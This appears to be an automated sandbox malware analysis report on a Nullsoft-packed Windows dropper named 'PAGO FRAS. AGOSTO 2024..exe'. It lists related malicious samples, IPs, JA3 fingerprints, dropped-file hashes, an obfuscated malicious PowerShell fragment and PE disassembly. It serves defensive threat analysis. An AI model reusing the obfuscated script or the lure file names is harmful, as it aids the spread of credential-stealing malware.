	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	http://www.5movierulz.mom	Get hash	malicious	Unknown	Browse	172.67.72.9
	http://lvlup.page	Get hash	malicious	Unknown	Browse	172.67.184.158
	http://google.com	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://bbs-file.jiaxiao.pub/94f0e5e6a233429db4c5be400e2eb471/post/2024/03/29/933660672770703360.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	172.67.155.139
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
ORACLE-BMC-31898US	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	bin.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	130.61.149.67
	LNLAncf2v5.elf	Get hash	malicious	Mirai, Okiru	Browse	150.136.183.134
	SecuriteInfo.com.Win32.TrojanX-gen.28573.1762.exe	Get hash	malicious	Unknown	Browse	168.138.162.78
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	140.238.9.118
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	129.146.244.172
	arm4.elf	Get hash	malicious	Unknown	Browse	152.67.250.195

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.DropperX-gen.11998.28068.exe	Get hash	malicious	Atlantida Stealer	Browse	188.114.97.3
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	NEW CUSTOMER ORDER.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9	Get hash	malicious	Unknown	Browse	149.154.167.220
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	216.58.206.33 142.250.185.206
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 142.250.185.206
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 142.250.185.206
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 142.250.185.206
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	216.58.206.33 142.250.185.206
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 142.250.185.206
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	216.58.206.33 142.250.185.206
	Unlock_Tool_2.4.exe	Get hash	malicious	Vidar	Browse	216.58.206.33 142.250.185.206
	JuyR4wj8av.exe	Get hash	malicious	Stealc, Vidar	Browse	216.58.206.33 142.250.185.206
	SecuriteInfo.com.FileRepMalware.4445.21502.exe	Get hash	malicious	Unknown	Browse	216.58.206.33 142.250.185.206

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q2xjb4s.i2e.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu02nhix.l4n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpsakbxw.4az.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lo4esiim.tjt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Jdeforflgelserne.Kid

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	data
Category:	dropped
Size (bytes):	343001
Entropy (8bit):	7.668329656070028
Encrypted:	false
SSDEEP:	6144:AKRx5F2Bh8Q/UFTrg0VK6cVwsQbQMmBfUvg+PJrcWMuAobE365o6XqpExo:1750B3Urg0Vr9s3BMvLPlN8T65LqpExo
MD5:	3E7867EF75817E3ACC839677D6A3953B
SHA1:	7F4345E47DA8AD82BB351F50E340A5B40FAC5888
SHA-256:	71309200562392E24C8C8EBEA2369ECF3652F8155400B2A485D58569BB0110CC
SHA-512:	1D37506579139E5370E86A7DCD5C344FF961A79160A5C48BF98857274518A8313327BC1E9B2FC9A6E185D31AD891676A75468D18A661332DDF47D8099A69F996
Malicious:	false
Preview:	..u...e.r....@@@@............x...................z..............\|\|\|.h...`.......II.......pp.WW......y.....................U.....?...............\.......................bb.....ZZZ...yy..................TT......uuu....a.................................$$$$.........j....TT.......................[[...................c...F......""""..........&....i.....``````..$$$.+++++.$$.............+++........g..................T..}.............".._...............d...........!!!...iii..........11.................h..(......E...................s..........2.........q.........5........SS...4.^^^^....W......... ....2222.LLLLL.4...............AA..//....<.............E..................+.Z.=.......h.P.........{.@.......rr....ZZ....Y............SSSS........TTTTT.................Y.............-.{...p......GGG........,.....JJ......iii.........TT.............0..}}............................j........i.............ss.......TT.N.EEEEE.LLL........A....;...AA................gg........................SSSSSS....d.8..222

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	895897
Entropy (8bit):	7.722614502313072
Encrypted:	false
SSDEEP:	24576:/FxyAEp6l1UyqTxWBhc+alCJmvulW6Nd0va:3ykYxTxA2+m7mwMAa
MD5:	400AE56B0E2F429C20F563959042B2E9
SHA1:	383B18E2E55A4F7BEA251CC82AEC9CDAE9F22FED
SHA-256:	7E6DE6E460EC2322A30DFECA3A723811D3AC15486FA2139A3454EDBC7B1927DF
SHA-512:	CB9DF99342BA1B59461F14256790E40D82DB0D989E496B1E7EE3BAAEEA29DE464F307831CC43688261A8E55A067D8D5538EFDD3185695518C70CC84A67C3A827
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\discourteously.gam

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	339224
Entropy (8bit):	3.2329059465811363
Encrypted:	false
SSDEEP:	3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
MD5:	2AFAF6367CF5833A8885999FEFA5B44A
SHA1:	58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
SHA-256:	66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
SHA-512:	A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
Malicious:	false
Preview:	........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.\|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\psychograph.rut

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	data
Category:	dropped
Size (bytes):	91155
Entropy (8bit):	3.2484639775571122
Encrypted:	false
SSDEEP:	768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
MD5:	55DD84338306B8F361571D07E3D03F25
SHA1:	5F086147B0ED6D4CBE40B6F81C1003EB07714B94
SHA-256:	016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
SHA-512:	045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
Malicious:	false
Preview:	....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....\|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............\|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\strudsfjerenes.uns

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	data
Category:	dropped
Size (bytes):	411197
Entropy (8bit):	3.2412073600303604
Encrypted:	false
SSDEEP:	6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
MD5:	9548F6F7A71852794789DE0AC5FDE451
SHA1:	74C915E2C9C110929FD87C907BE17930B0B66B24
SHA-256:	2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
SHA-512:	0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
Malicious:	false
Preview:	....u...........................................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\unnamed.jpg

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
Category:	dropped
Size (bytes):	15845
Entropy (8bit):	7.693658939604953
Encrypted:	false
SSDEEP:	384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
MD5:	762778DFE1B62D3430B44A32AEDC03E0
SHA1:	7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
SHA-256:	9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
SHA-512:	B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	ASCII text, with very long lines (3113), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	54853
Entropy (8bit):	5.343396156779685
Encrypted:	false
SSDEEP:	1536:rPamKP6L416FHUmCNBYsKvWubxxebyGOKYCpdvJd:rbKg7UmCHYxb2RvP
MD5:	49EFAA361FA814AE9123A4402A61A0D1
SHA1:	FB0D528BD5092DB2EDBF5CDFD170C4F99F95DE3E
SHA-256:	F60736C8AE2A891DD30ED3139B9A809F6DB0A8073E6407F9FD3EA05CEE092D5D
SHA-512:	FFF32029EEEC0B5FF646941E636AC698220C1229EEC0DC85060800DA2F41382BB53537547D4A3BC7AE59D4FF68AE5FC71FE1FC5B50B89DF12DBF4337DCD1350F
Malicious:	true
Preview:	$Skriveheftes=$vennetjenesterne;..<#Snkens Overtenseness Dihalid Forfrysnings #>..<#Storgodsejers Behagelighederne Bristninger #>..<#rektifikationen Micromelus Thistles Periderm Stvleskaft Stedfaders #>..<#Sommerfugles hellgrammites Gumpetung Enjambed Vigorlesses Sabal #>..<#Antisacerdotalist Evisite Natational Dedicant Noergaard Teskeria #>..<#Salatfade Triumvirship Vatersotigheden #>...$Blokindskud = @'.Fict . Epi,$ConeeKSkrivnlungeoSeptag.ttemlPrin ePhy or Vold2Sor,k2 Baan0Korp =,idsn$ Rei,SDoomsiNon kxMezzotEpigri avignCise sP trokCallge Husesslang;K yst.TaknefRetaluMennenMocamc BandtPujahiAns do HjttnUdski uscW Stroa,orelvTmrereLunhewExclaiFrugtsEulale Anke Grudg(Patri$SnefyFPhoniyprofilObstrdZelmae Pranb hi,ptBet etDrif e P ycnRi ge,Enkel$ .ortSShoesuKern b oetj andeIslndc UndetAlludiKrftovMuc.leCy,ba)melle Prei.{ atio.Befli.Stubr$S,nkrKPlopdaHeimerWar,it Insio Prfaf .unsf danse Ragwl PeromDiscoeCriedlSag bsVidunfColona PayabV nyarGdniniBlokfk CockkAnsi e,litwr ccuss jort sym

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt

Download File

Process:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
File Type:	ASCII text, with very long lines (360), with CRLF line terminators
Category:	dropped
Size (bytes):	362
Entropy (8bit):	4.295609901239941
Encrypted:	false
SSDEEP:	6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
MD5:	A47DE65B255D62E154E75208730B37D2
SHA1:	9AD95C489EABDBCD12C02CD312C85D0C73A565F7
SHA-256:	1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
SHA-512:	206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
Malicious:	false
Preview:	beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.722614502313072
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PAGO FRAS. AGOSTO 2024..exe
File size:	895'897 bytes
MD5:	400ae56b0e2f429c20f563959042b2e9
SHA1:	383b18e2e55a4f7bea251cc82aec9cdae9f22fed
SHA256:	7e6de6e460ec2322a30dfeca3a723811d3ac15486fa2139a3454edbc7b1927df
SHA512:	cb9df99342ba1b59461f14256790e40d82db0d989e496b1e7ee3baaeea29de464f307831cc43688261a8e55a067d8d5538efdd3185695518c70cc84a67c3a827
SSDEEP:	24576:/FxyAEp6l1UyqTxWBhc+alCJmvulW6Nd0va:3ykYxTxA2+m7mwMAa
TLSH:	5F152257FBA4DCA7E865823010BE9532F2326D3654209647739EBF7A453333E491B2CA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.....

File Icon


Icon Hash:	4ccc524656d64e01

Static PE Info

General

Entrypoint:	0x40310f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F6128E8C033h
push ebx
call 00007F6128E8EFA1h
cmp eax, ebx
je 00007F6128E8C029h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F6128E8EF1Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F6128E8C00Dh
push ebp
push 00000009h
call 00007F6128E8EF74h
push 00000007h
call 00007F6128E8EF6Dh
mov dword ptr [0042E404h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [0042E4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428828h
call dword ptr [00407174h]
push 00409188h
push 0042DC00h
call 00007F6128E8EB97h
call dword ptr [0040709Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F6128E8EB85h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x1aa58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
